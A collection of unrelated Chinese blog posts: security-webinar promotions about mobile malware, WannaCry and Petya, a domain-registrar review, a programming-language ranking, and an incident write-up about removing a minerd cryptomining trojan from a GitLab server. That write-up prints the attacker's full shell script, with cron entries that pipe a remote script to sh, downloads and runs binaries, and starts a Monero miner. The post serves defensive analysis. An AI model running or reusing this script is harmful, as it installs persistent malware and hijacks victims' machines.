智能手机等移动设备的普及将人们带入了移动互联网时代，同时，移动设备也越来越多的进入到企业办公之中，移动互联网为我们带来便利的同时也引发了关于移动安全的担忧，现在恶意软件以移动设备为依托，肆意传播，所以，控制恶意软件的传播刻不容缓，企业移动安全的问题不可忽视。
众所周知，Android设备相较于IOS设备的漏洞更多，主要是因为Android是一个开源的系统，每个独立的手机商都可以根据自己的需求对Android进行定制，而且应用的审核标准也比较低，这就成了恶意软件利用的目标；随着技术的发展，恶意软件的制作成本也越来越低，导致移动端的攻击行为逐渐规模化，而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备，这些设备上的数据泄露只要是因为其硬件可远程操控，另外，移动设备本身也可以作为发起攻击的媒介；攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据，它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中，应尽力确保移动应用的安全，因为企业移动化的很多功能都是基于移动应用来实现，而现在大多数开发者只注重产品的迭代和技术攻破，在应用安全性方面并没有投入太多的资源，这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度，先做好员工安全意识教育，培养员工良好的使用移动设备习惯。
其次，企业在选择移动办公产品时，除了注重产品的品质和服务外，还应该注重产品的安全性。随着技术的发展，产品在技术和功能方面的差异越来越容易被复制和超越，而安全性不但是未雨绸缪的超前意识，更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识，敬请关注7月25日14:00，Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动，届时，Check Point资深网络安全顾问谭云老师，将对CheckPoint下一代安全管理体系进行详细阐述，为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>>

自今年5月爆发wannacry勒索病毒以来，各种蠕虫病毒接踵而至，着实是让世界杀毒市场活了一把，“暗云Ⅲ”，Petya等等，一个比一个厉害，令人防不胜防，即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯，病毒预防的意识也很差，而且大多数用户更倾向于老旧版本的操作系统，以为旧的系统各方面都更加成熟，用起来也顺手，对于系统升级，维护方面有很强的抵触心理。



这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件，这一点相信大多数的人都做到了这一点；在使用杀毒软件的时候，建议开始病毒库自动更新，保证杀毒软件可以最快的识别网络上的新型病毒，另外，建议每周至少一次对个人电脑进行一些全盘病毒扫描，确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施，以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中，可对自己的计算机做病毒扫描，察看它是否存在安全漏洞与病毒。如果你经常在线，这一点很有必要，因为如果你的系统没有加设有效防护，你的个人资料很有可能会被他人窃取。
3、在使用外接设备（例如U盘，光盘，移动硬盘灯）时，先对其进行扫描，以防万一。
4、不安装来历不明的软件，下载软件要到官方指定的站点下载，切不可贪图省事去一些未知网站，以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识，敬请关注7月25日14：00，Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动，届时，Check Point资深网络安全顾问谭云老师，将对CheckPoint下一代安全管理体系进行详细阐述，为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约

现在越来越多的黑客行为都趋向以盈利作为目标，黑客通过攻击企业内部系统或网站来达到其目的，近期最受关注的莫过于5月份Wannacry勒索病毒事件，全球超过100个国家受到病毒的影响。那么，作为中国目前最大的第三方支付平台的支付宝为什么从没有传出过被黑的新闻？

在2008年，支付宝乃至阿里巴巴整个平台的网络进行了大规模的升级维护，不夸张的说，其安全级别甚至可以和五角大楼相比，这并非说黑客无法攻破，而是黑进去以后的数据连锁机制无人可破，支付宝的数据保护有自启动和认为启动两种，触发后的结果就是整个支付宝平台陷入瘫痪，等工程师修复漏洞后重启才可继续使用，而平台内的资金在这期间只是一串数字，在这期间无法转入转出分毫，也就是说，黑了你也取不走。全世界的大型银行的网络终端各有不同，唯独这个闭锁机制大同小异。
近年来，黑客行为变得似乎更加猖獗，每年都会有数起大型企业遭到入侵事件，甚至连世界知名的杀毒软件厂商卡巴斯基都惨遭毒手，正应了那句老话“玩鹰的被鹰啄了眼”；2015年6月，该公司声称探测到一次针对其系统隐蔽性极高的黑客攻击，实施这次攻击的黑客很可能是策划 2011 年 Duqu 木马的幕后黑手。就在2015年，美国还有 CVS 等连锁药店、大型电信运营商 、婚外情交友网站、大型医保企业、美国官方各部门等均被黑。国内企业也不例外甚至更严重，网站被黑的原因很大一部分是属于经济原因，但并非所有攻击都是因为经济缘故。
黑客行为一般分为以下四种：
一、受雇于他人，商业竞争对手恶意竞争，雇佣黑客攻击同行，敲诈勒索，盗取同行银行账户信息以获取既得利益；
二、恶作剧型，这一类的黑客行为大多是新手黑客，为了满足自己的虚荣心，搜索肉鸡，攻击一个网站，挂上网页木马来试验自己的水平。
三、打击报复型，在互联网行业，因相关服务不到位引起的商业纠纷陷入解决的僵局之后就容易出现黑客攻击报复的行为。
四、窃取资料型，主要是针对拥有付费产品信息的网站。
至于说黑客攻击支付宝这种巨头级企业的可能性则微乎其微，举个很简单的例子，盗贼如果想去某个村民家里偷只羊或许很容易，但是即使再多的盗贼也很难攻打下一个城市。因而一般来讲除了受雇于竞争对手的成建制黑客外很少有人敢对巨头企业下手。
在这一波一波勒索病毒爆发的浪潮之中，安全威胁是每个人头顶上挥之不去的阴云。数字时代为人类带来便利的同时，安全是永恒的话题。其实，对勒索软件的防范应该变被动为主动。Splunk 主动追踪安全威胁，显著增强追踪网络攻击者的能力。精彩尽在 7月25日14：00，Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动，届时，Check Point资深网络安全顾问谭云老师，将对CheckPoint下一代安全管理体系进行详细阐述，为您详解安全管理的未来发展趋势。
点击此处预约直播>>>

WannaCry的阴云还未散去，Petya就已经迫不及待的出现在人们视线之中， 6月27日东欧地区又爆发了新一轮的勒索软件（Petya）攻击事件，受灾最严重的当属乌克兰，大量的政府机构，私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒，但是其破坏力比之之前的Wanncry更加可怕，Petya不只是锁定特定文件，而是直接对磁盘的MBR下手，篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索，而是直接破坏前25个扇区，当硬盘的MBR损坏之后，计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞，这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播，所以即便电脑修复“永恒之蓝”漏洞，只要内网有中毒电脑，仍有被感染的危险。
面对目前安全运维管理中存在的问题， Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00，Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动，届时，Check Point资深网络安全顾问谭云老师，将对CheckPoint下一代安全管理体系进行详细阐述，为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>>

不得不说，AlphaGo再一次引爆人们对于人工智能的认知。在智能化引领发展的阶段中，人工智能技术正在越来越广泛地应用在移动互联网领域，越来越多的人工智能技术更多地参与到移动互联网发展中来。
说到人工智能，不得不提人脸识别技术，今天小编要跟大家分享的就是这项引爆市场的“黑科技”。
都说这是一个刷脸的时代，是的“刷脸”的时代真的来了。
6月30日14:00“身边的黑科技，人脸识别的场景化应用”直播活动即将在OTpub平台开启，与您见证万能的“刷脸时代”，我们从人工智能平台到人脸识别技术，完整的介绍人脸识别在我们身边的场景化应用。

直播预约地址：http://www.otpub.com/home/live/baoming.html
 

说到勒索病毒，大家都会不自觉的想到WannaCry。是的，因为，它的爆发真的让好多人哭晕在厕所，而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒，是通过互联网端口输入病毒程序，对重要文件进行加密然后敲诈，攻击目标直接锁定用户的数据，攻击手段竟是原本为了保护数据安全的密码技术，这些都提醒人们保护网络安全刻不容缓。
此外，网络病毒存在巨大的获利空间，在一段时间内，可能还会出现更多的变种病毒。因此，我们完全有理由相信，WannaCry只是一个开始。
知己知彼，才能百战不殆，下面O宝就为大家总结下，勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播，当用户不小心访问恶意网站时，勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中，一旦访问了这些网站，恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道，与其他恶意软件捆绑发布传播；或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”，我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术，Sophos致力于为企业提供整体安全解决方案，Intercept X 这么牛，还有哪些我们不知道的？想了解更多，看直播！
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启，Sophos Intercept X，何止看上去这么简单！
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”

发现问题

最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用情况如下：

让后登录到服务器，利用top查看CPU使用情况，这个叫minerd的程序消耗cpu较大，如下图所示：

这个程序并不是我们的正常服务程序，心里一想肯定被黑了，然后就搜索了一下这个程序，果真就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工作的，然后怎么修复一下后门。
 
这个程序放在/opt/minerd下，在确定跟项目不相关的情况下判断是个木马程序，果断kill掉进程，然后删除/opt下minerd文件。

本想这样可以解决，谁想不到15秒时间，又自动启动起来，而且文件又自动创建，这个让我想起了crontab的定时器，果然运一查确实crond存在一条：，果断删除处理。再杀进程，再删文件；然并卵，依旧起来；

既然没用我继续google，在stackexchange找到如下解决方案：

各种文件删除都不起作用，原来该木马程序注册了一个“lady”的服务，而且还是开机启动，起一个这个可爱的名字，谁TMD知道这是一个木马， 这个伪装程序也可能是ntp，可以参考：http://53cto.blog.51cto.com/9899631/1826989  。
 
这下完美解决了，但是得分析一下原因，shell启动脚本：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin



echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root



if [ ! -f "/tmp/ddg.217" ]; then

    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217

fi

chmod +x /tmp/ddg.217 && /tmp/ddg.217

killall /tmp/ddg.216





if [ -d "/opt/yam" ]; then

    rm -rf /opt/yam

fi



ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9



#/opt/minerd -h

#if [ $? != "0" ]; then

    #ps auxf|grep -v grep|grep "/opt/minerd"

    #if [ $? != "0" ]; then

        #if [ ! -f /opt/yam ]; then

            #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam

        #fi

        #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr

    #fi

#fi



DoMiner()

{

    if [ ! -f "/tmp/AnXqV" ]; then

        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV

    fi

    chmod +x /tmp/AnXqV

    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x

}

ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner





DoRedis6379()

{

    iptables -F REDIS6379

    iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT

    #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT

    iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT

    iptables -I INPUT -j REDIS6379

}

iptables -D OUTPUT -j REDIS6379

iptables -F REDIS6379

iptables -X REDIS6379

iptables -D INPUT -j REDIS63792

iptables -F REDIS63792

iptables -X REDIS63792

#iptables -N REDIS6379 && DoRedis6379

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限。

商业模式

被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操作会明显卡慢、散热风扇狂转；另一个危害在于，“挖矿木马”会大量耗电，并造成显卡、ＣＰＵ等硬件急剧损耗。比特币具有匿名属性，其交易过程是不可逆的，被盗后根本无法查询是被谁盗取，流向哪里，因此也成为黑客的重点窃取对象。

攻击&防御

植入方式：安全防护策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗（CPU／load）。
这种木马很容易变种，很多情况杀毒软件未必能够识别。

前言

前方私货预警！！由于域名购买都是个人经验，以下内容都是主观体验。想看统计数据的请绕行。
 
看到那么多人推荐GoDaddy，作为过来人实在是看不下去。

首先说说自己的经历，本人不是专职炒域名的，但是平时喜欢做些小东西，码农本性啊。买域名快10年了，前后也有十几个，其中有一些用到现在，大部分1年以后就没再续。注册商前前后后换过好几家，海外的那几家大的基本上都用过。在这里逐一点评一下。许多时候价格当然重要，但是买东西真的不能只看价格。
 

先说GoDaddy

这个公司的规模够大，毕竟起步早，推广也很不遗余力。但是老实说他们不管是从节操上还是能力上都不太跟得上时代了。黑点实在太多，一条一条写：
 

1. 最近几年出过好几次DNS被黑的情况，要知道域名注册商的DNS服务器被黑可不是小事情。几千万的网站随时解析不了，但就是这样GoDaddy还是被黑了不止一次。可见内部管理已经僵化，反应不过来了。找则新闻大家练练英语：GoDaddy Hacked, Millions of Sites Down 。
2. GoDaddy前几年偷域名的事情搞得沸沸扬扬。许多人在GoDaddy上搜好的域名第二天上去买了就发现被GoDaddy给抢注了，到了二级市场价格直接翻上成百上千倍。
3. 这个公司的定价策略不是很透明。比如有一次看到.com域名2.99刀的，点进去一看原来是要签两年合约的第一年才2.99刀，第二年就要回到14.99.算下来两年也没比namecheap便宜多少。倒不是说真的稀罕这点钱，有的时候就是不喜欢绕着弯儿来骗你的感觉。
4. 本身的销售团队KPI考核压力太大，连他们的客服都是不遗余力地想卖你东西。有什么问题打电话过去问题还没解决先问你要不要续费，哭笑不得。
5. DNS更新速度很慢。至少前几年要好几个小时才生效。几年没用了不知道现在有没有好点了。
6. 他们支持SOPA。对于我来说这是无法接受的互联网公司立场。当然这只是这是我的个人立场，不展开。

但就是这样的一个奇葩公司，不知道为什么在国内有那么多人追捧。我在刚刚开始要买域名的时候也是在某个论坛看到了类似的帖子一边倒地推荐GoDaddy，结果是好多年的窝火。今天愤怒地写出来，就是希望大家不要重蹈覆辙。
 

name.com

在被GoDaddy虐了好几年以后，经朋友推荐了http://name.com，只用了一次就全转过去了。你要说他们有什么特别的，其实真的没什么。就是买东西 -> 付钱 -> 开用。 老实说我们消费者其实真的很容易伺候，只要 许诺多少=给多少 的大家基本上就跪了。价格上来说，新注册的会比GoDaddy贵一些，10刀左右，但人家续费也是同一个价，不会一不小心被高价续费，那叫一个心疼。name.com的问题是他们的域名服务器更新速度跟GoDaddy差不多，改个DNS都要好几个小时。
 
但这几年name.com做了几件让我小小不爽的事情：

1. 大部分域名都提价了，比如.com从$9.99到了$10.99。
2. 在别人都开始提供免费ssl的时候，他们居然连自己的主站都不用ssl（印象中是今年8月才开始用）。这让我觉得有点不放心。

于是我又问了一圈朋友，终于找到了namecheap。
 

namecheap

真是后知后觉，居然直到去年底才发现这个神器。各方面都不错，是我现在的主注册商，强烈推荐。namecheap的价格不算最便宜的，但是各方面做得真的真的都很好，包括但不限于：速度，控制台，客服响应，稳定性，免费的ssl和whois privacy等等。而且碰到了域名转出和退款什么的都完全不拖泥带水，可以说性价比非常高。
 

enom

enom在国内可能知名度不是很高，但其实是很老牌的域名注册商，namecheap直到最近之前还只是个enom的分销商（就是说他们直到最近才成为ICANN的正式域名注册商）。Google App提供的域名管理后台就是GoDaddy和enom二选一，换句话说Google也是enom的分销商之一。（话说真是怀念几年前的Google App，每个在Google上注册的域名都会送Gmail、Google Calendar等神器，这么多东西一年才10刀实在是超值，想想现在每个月至少要5刀，后悔没多弄几个哎）。
 

enom现在的问题是他们企业路线对我们不友好。这个公司逆互联网的趋势而行，这几年极其注重分销市场，而懒得搭理最终消费者市场（怀疑公司是不是被三哥把持了）。搞到现在他们的零售价格比起name.com和namecheap都要更高一些。而客服也比较不上心。总的来说属于没有太大缺点但是也没什么吸引力的，鸡肋化了。
 

1&1

最后我想专门提一下1&1。如果说GoDaddy是个奇葩的话，这个公司真是奇葩中的战斗机。首先他们家的价格真的是很便宜，便宜到你会有“卧槽有没有搞错”的想法。但是千万不要上当，尤其是绑定信用卡。我再强调一遍，千！万！不！要！上！当！随便在网上搜一把就能看到无数人的血泪史，域名无法转出，域名转出以后信用卡继续扣钱，客服永远没人听电话，客服听不懂英语，要知道这可是美国公司啊亲！
 

购买域名总结

此外，以下为周围朋友闲聊时的总结，我没有真的用过，大家参考一下：

- 很不错的：Gandi，NameSilo，还有最近的uniregistry.com
- 值得一试：IWantMyName, DynaDot
- 很差：http://hover.com据说跟1&1差不多，居然价格还不便宜。另外，大部分的和主机套餐绑定的域名都要慎重考虑，比如Bluehost / Dreamhost等等，他们的问题就是合同很复杂，域名单独续费转出都很麻烦。
 
除了域名注册商以外，还有几个关于站长的问题在这个帖子里也有提及，一起聊一下：
 

SSL

免费的SSL如果放在前几年会很有吸引力，但最近几年门槛越来越低，ssl也不是一个稀罕东西了。随便说几个平民的ssl解决方案：

1. startssl直接免费 StartSSL™ Certificates & Public Key Infrastructure
2. cloudflare的免费版自带ssl Home | CloudFlare
3. @Rio 提到的Comodo确实不错，但是本来也不值几个钱。去Cheap SSL Certificates. Buy or Renew Cheapest SSL at $4.80 也就是4块8美刀一年。

 

Whois Privacy

关于Whois Privacy不是说有免费的提供就一定要用，主要的顾虑是这个可能会影响搜索引擎优化（SEO）。有很多的讨论比如：SEO Question : Do WhoIs Privacy Services Harm SEO?
 
结论都是是出于SEO的目的尽量还是不要隐藏自己的信息。其实这从谷歌的角度也好理解，你从事正当生意那是巴不得全世界都知道你的电话，有什么好怕的？从我个人角度来看我用实名注册了那么多域名都没有因为这个被骚扰过。说到底你的邮件和电话没你想象的那么重要。

当然我知道有人会问，我有证据吗？这个还真没有。可是SEO的事情谁说的准？能做的也就只有可悲的自我审查了。我把这个顾虑留在这儿，大家可以自行判断。
 

DNS记录管理

哪怕是namecheap和name.com，他们的管理界面以2014年的眼光来看都不太好使，DNS刷新速度也不是很理想。我的做法一般是国外域名就直接把name server(域名服务器)转到Home | CloudFlare，国内的转到DNSPod-免费智能DNS解析服务商。速度快，界面好，免费。
 

说了半天，那到底怎么样才能省钱？

好。。好。。别急。。让我喝口水。在离题万里以后回到楼主的问题。现在假设各位看官现在已经被我说服，要买namecheap的.com域名，去了官网一看10.69，算上icann的注册费0.18总共不到11刀，合70人民币左右。
 
土豪当然不在乎，但是相信对于大部分人尤其是学生党来说还是能省则省。于是在这里我又要推荐另一个最近在reddit上很火的神器：Domain Price Comparison （domcomp域名价格网）
 
首先他们在主页上有最新的优惠码，而且更新的很勤快。妈妈再也不用担心每次买域名到处瞎jb搜优惠码了。


比如现在是2014年10月17号，这个优惠码就是到10月31号之前都可以用，已经比直接注册省了一刀还多了。请大家自行忽略1&1，人生苦短，life is too short to deal with 1&1。（话说GoDaddy居然只要1.49刀才10块人民币 ，把淘宝都秒了有木有。。。。搞得我都有点心动）

当然优惠码还不是最重要的，关键是这个网站还提供返利，可以折上再折，加入方法很简单，点击右上角的affiliate。就是这个：

注册很简洁，填一下邮箱就能进去了（不知道为什么想到了国内那些注册。。。邮箱认证。。手机绑定。。。）

登陆以后会进到dashboard，也就是控制台。你会看到有一个链接在中间是绿色的，这个就是你的返利链接

下面（请注意这一步很重要），点一下你的返利链接，回到了domcomp.com的主页。是不是看上去什么都没变？ 其实不然，你的返利码已经在cookie里面了。接下来就直接点namecheap的价格链接去namecheap注册账号+买域名吧！
 
这个网站反应很快，一般来说买了以后几个小时就会收到邮件确认交易。我现在已经有4个域名通过他们买的(三个.com和一个.io)，总共花了八十几刀（io域名真tmd贵）里面有将近20刀的返利。

仔细算了一下，.com的总共花了40人民币不到，买了namecheap + ssl + whois privacy。而淘宝最便宜的也要60多。这么说来淘宝利润也不错，无本买卖做一单25块钱。
 
最后，买的时候有几点要注意:

1. 记得每次都要注册新账号，我也不知道为什么，但是namecheap貌似只对新注册账号有返利。
2. 每次买之前，都最好确认一下返利码在cookie里面，我的做法就是登陆一下专门点一下返利链接，然后再点namecheap。这个时候刷新返利控制台，看看点击数(clicks)有没有增加。比如我刚刚点了一下以后，我的控制台里就从11变成12，也就是说我这个点击是有效的返利点击。

利益相关：domcomp.com的链接是我自己的返利链接，也就是说你通过他们买域名的话，除了你实惠以外我也有钱收。

作者：范进
链接：https://www.zhihu.com/question/19551906/answer/31986656
来源：知乎

摘要

想知道全球最受欢迎的编程语言是什么吗？它们的判断标准又是怎样的呢？

我们都知道，C++，MATLAB，Java 一直都受到技术学院的青睐，大多数毕业生都热衷于学习这些语言。但它们是否是业界所需要的呢？抱着这个疑问，我们访问了几个可信度较高的语言索引网站，同时还深入到 Indeed 和 Glassdoor 等全球门户网站，试图收集数据，以总结出全球最受欢迎的语言是哪些，以及行业内最需要的语言是什么。

注：对编程语言进行受欢迎度评选，并不是为了证明哪项语言好，哪项语言不好， 而是希望能通过这一类分析，找出用户最喜欢以及业界最需要的语言。 
 

TIOBE Index

TIOBE 编程社区索引由荷兰 Eindhoven 的 TIOBE 公司创立和维护。TIOBE 代表着“真诚的重要性”，该索引将每项语言作为关键字，按照搜索引擎的查询数量对语言进行排名。因为 TIOBE 只索引图灵完全的语言，因此 SQL 和 HTML 没有考虑在内。2016年11月的排名结果显示，Java 依然是最受大家欢迎的语言，C 和 C++ 排名紧随其后。出人意料的是，Visual Basic 和 Python 排名有大幅上升，并排在了 Javascript 之前，另外，汇编语言也挤入前十：

PYPL

PYPL（编程语言流行指数）依据 Google 上关于语言教程的搜索频率进行统计。从全球搜索引擎流行度来看，Java 依然是大赢家；Python 较之前五年排名提升 6.8%，而 PHP 暴跌5.0%。

Constantin Brancusi 大学的 Adrian Runceanu 教授在 C++，Java，Oracle 方面有16+年的研究经验。关于 C++ 为什么能在跻身编程语言的前十，他是这么说的：

“我认为 C / C ++ 为大家提供了一个很好的使用机制，我们可以用这项语言创建可移植的应用程序，并且，C/C++ 易于学习，很受学生欢迎。其他语言，如，Javascript，Java，Python 则更适合于 Web 应用程序的开发。我相信 C/C++ 在未来几年依然具有支配性。”

StackOverflow

Stack Overflow 是一个问答平台。它有超过400万的用户，问答了1000多万个问题。根据问题情况，Javascript 的使用者比其他语言的都要多。另外，与 Node 和 Angular 相比，PHP 排名有所下滑。

GitHub

在2016年9月年度会议之前，Github 在此分享了其统计报告。

在过去的12个月里，Github 的活跃用户数量超过580万，活跃存储库数量超过1940万。随后它在平台上公布了热门语言排行表。我相信看过这个列表的人都会知道 Javascript 占据了榜首，当然这都没什么好惊讶的，值得惊讶的是它赶超竞争对手的程度之大......

 

HackerEarth

HackerEarth 每月都会为用户提供大量的编码挑战和应聘机会。该公司支持30多种编程语言，用户可随心选择。HackerEarth 内有100多万名程序员，来看看他们最喜欢使用的是什么：

Indeed

Indeed 是美国最高流量的工作网站之一，可在50多个国家使用，支持28种语言。按照使用量排名，Java 排在第一位，Javascript，PHP 和 C 以一万多的差距尾随其后。令人惊喜的是，R 语言也出现了竞争的势头。

Deepak Garg 教授（数据挖掘以及IEEE计算机协会印度理事会主席的专家）对此的看法是：“计算行业许多工具和应用程序的基本组成都存在着弥合差距，这导致了语言复杂度的演变，使得语言级别比以前更高，这有助于程序员更多地关注逻辑和应用程序，而不仅仅是在实现标准数据类型和构造的复杂结构和语法。

Glassdoor

这个网站的成立使员工可以对组织进行评价。Glassdoor 列出了开发者的工作事项。如果按开发人员的类别排名，该公司最需要的是 Java 开发人员，其次是 Javascript。当然，R 和 C++ 也比较受欢迎，Python 和 Perl 的需求也有了上升。

2017年学习的语言

看这趋势，Java 和 Javascript 依然会是 Web 开发行业最受欢迎的语言，Google 的 Go 也乘胜追击，Ruby 还是比较受初创公司的欢迎。根据数据分析，Mozilla 的 RUST 和 Facebook 的 HACK 在2017年下半年也能挤入排名前列。

2017年排名有望上升的语言：
R——如今，世界对统计数据和数据分析的需求越来越大，如果你发现你的工作内容越来越与R挂钩，那么，R成为2017年最受追捧的语言并不是不可能。

MATLA——一旦成为数学家和科学家的核心语言，MATLAB 在分析和统计的领域发挥的作用会越来越大，会有更多的开发人员将回到 MATLAB，因为数学分析的复杂性正在增加。

SQL——随着越来越多的人获得板载技术，数据库的使用一直在呈指数增长。SQL 可谓是为数据库忠实粉量身定做的。

Arduino——这并不是一项新语言，它由 C 和 C++组合而成，随着越来越多的嵌入式芯片等待被编码，Arduino 将有望成为2017年使用的新技能。

Swift——苹果公司面对开发人员的抱怨，决定用 Swift 取代 Objective-C，其编码速度还是十分可观的，目测 Swift 的开发市场会不断扩大。

当然，以上只是我做出的大胆猜测。2017年到底会掀起怎样的编程语言风呢？我们还是拭目以待吧！

译文地址：https://www.oschina.net/news/79650/2017-top-programming-languages
原文地址：http://blog.hackerearth.com/2016/11/top-programming-language-2017.html